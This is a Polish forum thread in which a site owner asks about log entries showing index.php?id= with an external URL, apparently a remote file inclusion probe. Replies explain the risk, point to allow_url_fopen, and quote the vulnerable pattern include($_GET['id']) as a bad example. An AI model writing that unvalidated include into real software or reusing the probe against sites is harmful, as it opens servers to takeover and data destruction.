witam,
przeglądałem dzisiaj statystyki odwierdzin swojej strony, i zauważyłem tam dziwny wpis:

[HTML] pobierz, plaintext 
index.php?id=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F
[HTML] pobierz, plaintext 

takich wpisów było kilka różnych pod względem zawartości ciągu po 'index.php?id='.
może ktoś z Was spotkał się z czymś takim, i jest w stanie mi napisać co to jest?

pozdrawiam

Pewnie na stronie przekierowujesz działy po $id w $_GET i ktoś chciał oszukać Twój system.

To efekt działania bota, który testuje czy Twoja strona jes podatna na ataki polegające na zaincludowania pliku z zew. serwera. Jeśli masz allow url fopen na off nie masz się czym martwić.

rozumiem, że jeśli nie miałbym zdefiniowanej zmiennej $id, to miałbym problem?
co by to mogło spowodować?
czy ustawienie 'allow url fopen' ustawia administrator serwera www?

zle z toba jak masz po prostu:

[PHP] pobierz, plaintext 
<?php include( $_GET['id'] ); ?>
[PHP] pobierz, plaintext 

jak walidujesz id, sprawdzasz nazwe itp to jest OK

ooo nie, nie, nie... jakby to powiedział mój synek.
tak źle ze mną nie jest.
ale co może spowodować zaincludowanie zewnętrznego pliku?
np. podszycie się pod stronę, i zrobienie aqq?

Wszystko, usuniecie plikow, bazy, cokolwiek co da sie z php zrobic